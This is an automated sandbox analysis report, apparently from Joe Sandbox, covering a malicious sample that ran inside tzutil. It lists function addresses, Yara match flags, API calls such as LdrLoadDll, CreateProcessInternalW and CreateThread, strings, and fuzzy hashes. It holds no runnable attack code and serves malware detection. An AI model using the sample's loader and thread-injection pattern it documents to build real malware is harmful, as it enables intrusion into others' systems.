                                                                    Function 031D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                    • Instruction ID: 3b558277d715a7d3bd22ec889b697d3eb2ebe74f45de585988536bfc94dd8190
                                                                    • Opcode Fuzzy Hash: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                    • Instruction Fuzzy Hash: 00900221211C0443D204B5684D14B07000587D4703F55D115A0155554CCB1689615521
                                                                    Function 031D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                    • Instruction ID: 4322f083587ca7e263fd9dbd06853270cdc16840cb86d2a7029bc46ad92c60b7
                                                                    • Opcode Fuzzy Hash: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                    • Instruction Fuzzy Hash: AD90022160180903D105B1584504616000A87D4641F95D022A1025555ECB268A92A131
                                                                    Function 031D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                    • Instruction ID: 448fb4461873297abbce62fb04fa9663fe237b27eda2032a1d239e312509b951
                                                                    • Opcode Fuzzy Hash: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                    • Instruction Fuzzy Hash: 0C900261201C0803D144B5584904607000587D4702F55D011A2065555E8B2A8D516135
                                                                    Function 031D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                    • Instruction ID: 08d74ea5aa4ee914bb66bf2d776a735d8ac3e1eb52bd0b25c81b4dd9abd39b33
                                                                    • Opcode Fuzzy Hash: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                    • Instruction Fuzzy Hash: 2090022921380403D184B158550860A000587D5602F95E415A0016558CCB1689695321
                                                                    Function 031D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                    • Instruction ID: 1d6be6f881577b58657fee55b370efd2b4f04aad8d6833d880dcd20efda069a5
                                                                    • Opcode Fuzzy Hash: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                    • Instruction Fuzzy Hash: 2290022130180403D144B15855186064005D7E5701F55E011E0415554CDB1689565222
                                                                    Function 031D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                    • Instruction ID: d5b059ab8823b0c47fbe6b6c8f6e9c75dc477de2a5063ec0b4a0ba7d330668c5
                                                                    • Opcode Fuzzy Hash: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                    • Instruction Fuzzy Hash: 1E900221242845535549F1584504507400697E4641795D012A1415950C87279956D621
                                                                    Function 031D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                    • Instruction ID: 57acc7bdc75403b526ae999df4dc7f994bd743a139b0ddf596870d8cd8cd1424
                                                                    • Opcode Fuzzy Hash: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                    • Instruction Fuzzy Hash: 3B90023120180813D115B1584604707000987D4641F95D412A0425558D97578A52A121
                                                                    Function 031D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                    • Instruction ID: 484e3f84f130a6e2537cbf0f04b743dfa7b3784918a298c65b36ba0a896a03f4
                                                                    • Opcode Fuzzy Hash: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                    • Instruction Fuzzy Hash: 3C90023120188C03D114B158850474A000587D4701F59D411A4425658D879689917121
                                                                    Function 031D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                    • Instruction ID: 090354a28c9dffe3941f39f1aee9703fa7aaf87be8112a314202c9bb311ddef1
                                                                    • Opcode Fuzzy Hash: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                    • Instruction Fuzzy Hash: DF90023120180C43D104B1584504B46000587E4701F55D016A0125654D8716C9517521
                                                                    Function 031D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                    • Instruction ID: 6c1bc5d287457dfec1785702f69b51632eff13ff601256d6576cfbe4255f8930
                                                                    • Opcode Fuzzy Hash: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                    • Instruction Fuzzy Hash: 0490023120180803D104B5985508646000587E4701F55E011A5025555EC76689916131
                                                                    Function 031D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                    • Instruction ID: d66a03258bfc2093e265cc569defb09514af33c2e88bab33211f9d3036ee27d8
                                                                    • Opcode Fuzzy Hash: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                    • Instruction Fuzzy Hash: E990023160590803D104B1584614706100587D4601F65D411A0425568D87968A5165A2
                                                                    Function 031D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                    • Instruction ID: f4836a5573d8a0627e0bd09f064908733d7ef83cf0e21d65350424bc30b6982e
                                                                    • Opcode Fuzzy Hash: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                    • Instruction Fuzzy Hash: 0790022124585503D154B15C45046164005A7E4601F55D021A0815594D875689556221
                                                                    Function 028C114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 429 28c114d-28c1158 430 28c11d8-28c1247 call 28db890 call 28dc2a0 call 28c4990 call 28b13e0 call 28d2000 429->430 431 28c115a-28c1166 429->431 445 28c1249-28c1258 PostThreadMessageW 430->445 446 28c1267-28c126d 430->446 432 28c1168 431->432 433 28c11c3-28c11d4 431->433 432->433 445->446 447 28c125a-28c1264 445->447 447->446
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: 86fcdc446e042d08d8ee4f19affcbd7d11a4edc46b5e057bf5dc132545be1675
                                                                    • Instruction ID: 7737bddee35d5b146b68c8419a5179fa7f9499364b5232ddb471925e26928ad4
                                                                    • Opcode Fuzzy Hash: 86fcdc446e042d08d8ee4f19affcbd7d11a4edc46b5e057bf5dc132545be1675
                                                                    • Instruction Fuzzy Hash: C621077AA0424C7AEB01EA995C82DEE7B7CEF40394B00816DE908E7241D7349D098BE2
                                                                    Function 028C11D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: 8e127785f9fbc15939f7294d992161831dd232f71603d106665b2f674b383fa6
                                                                    • Instruction ID: 0a4526d4ec10a9d318b69c2923d2e3a58dc5778e697960c0ff520497250e3fe6
                                                                    • Opcode Fuzzy Hash: 8e127785f9fbc15939f7294d992161831dd232f71603d106665b2f674b383fa6
                                                                    • Instruction Fuzzy Hash: BC11827A90024C7AEB109AE44CC1DEF7B7CDF41694F048158FA58F7240D6349E098BA2
                                                                    Function 028C11E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                                    • Instruction ID: 0233784d1f3c2d1a4aed585631979d7aa1d730b6a334c9628c8eebbe5152aa92
                                                                    • Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                                    • Instruction Fuzzy Hash: 5B0161BA90025C7AEB11ABE45C81DEF7B7C9F41694F058058FA58E7240D6345E098BA2
                                                                    Function 028D3E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 028D3EDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: c89d466a1f537602cdcc88f765f3ba306b210e40e28f7bc2ed7a6c4283033478
                                                                    • Instruction ID: 61122a2b87019528d83baf215bc3a17c747e1b098acbed68c4d53572ee236327
                                                                    • Opcode Fuzzy Hash: c89d466a1f537602cdcc88f765f3ba306b210e40e28f7bc2ed7a6c4283033478
                                                                    • Instruction Fuzzy Hash: 99318EB9A01605BBD714DFA4CC80FEBBBB9EB88714F00415CE61D9B240D774AA04CFA1
                                                                    Function 028CF8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                                    • Instruction ID: b9c871c2c7e3de7739ade666eed2b97f55c38f11fd086b5e55714b0336e18d78
                                                                    • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                                    • Instruction Fuzzy Hash: 0731327AA00209AFDF14DFD8C8809EFB7BAFF48304F108559E505E7214D771EA058BA0
                                                                    Function 028CF8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                                    • Instruction ID: fd46629ac6f8d0294011e3c6669c046a4c7a77f2fc423815d5b59cbef493ae9d
                                                                    • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                                    • Instruction Fuzzy Hash: 4B3132BAA00209AFDB14DFD8C8809EFB7BAFF88304F108559E505E7214D775EE058BA1
                                                                    Function 028C4A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                                    • Instruction ID: f00692a047e7fb6855c2e75dd7af9d7c81b188d4484de2274c55f122cda23d20
                                                                    • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                                    • Instruction Fuzzy Hash: 3221B37F7001055FC315CA68D891BF9B728EB41225F20029CF914CF281D7319966C7D5
                                                                    Function 028C4A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4A02
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                                    • Instruction ID: 7ee455e06488fea73739b63e4d32fed321912809fc10b6a98f4aa3b3c19fa197
                                                                    • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                                    • Instruction Fuzzy Hash: 5B21DF3F6001868FCB11CE68D850BE9FF64EB86529F3042DCD468CB252D332D4AAC794
                                                                    Function 028C4990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4A02
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction ID: b3476d06ebc7acc7bad490ac921057b4f6c407bcd6278ac866321a43a39809e2
                                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction Fuzzy Hash: DB011EBDD4020DBBDB14DAA4DC41F9DB7B9AB44308F104195E908D7251F671E758CB92
                                                                    Function 028D9B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,028C8724,00000010,?,?,?,00000044,?,00000010,028C8724,?,?,?), ref: 028D9BB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction ID: f113d7baded6e849ebdfd922c6ee60d3446c0b4f8e0ad78579c88500f9695b2f
                                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction Fuzzy Hash: B501C0B6215108BBCB04DE99DC90EEB77AEEF8C754F108208FA0DE3240D630F8518BA5
                                                                    Function 028B9F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9F62
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                                    • Instruction ID: c989d74c0ba2c4cb3408d5932d800ced1da83291b65f866e93ff050d5a4e8308
                                                                    • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                                    • Instruction Fuzzy Hash: F3F0393B38030436E22161A99C02FDBA79D8F85B65F14002AFA0CEA680D996B8058AA5
                                                                    Function 028B9F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9F62
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
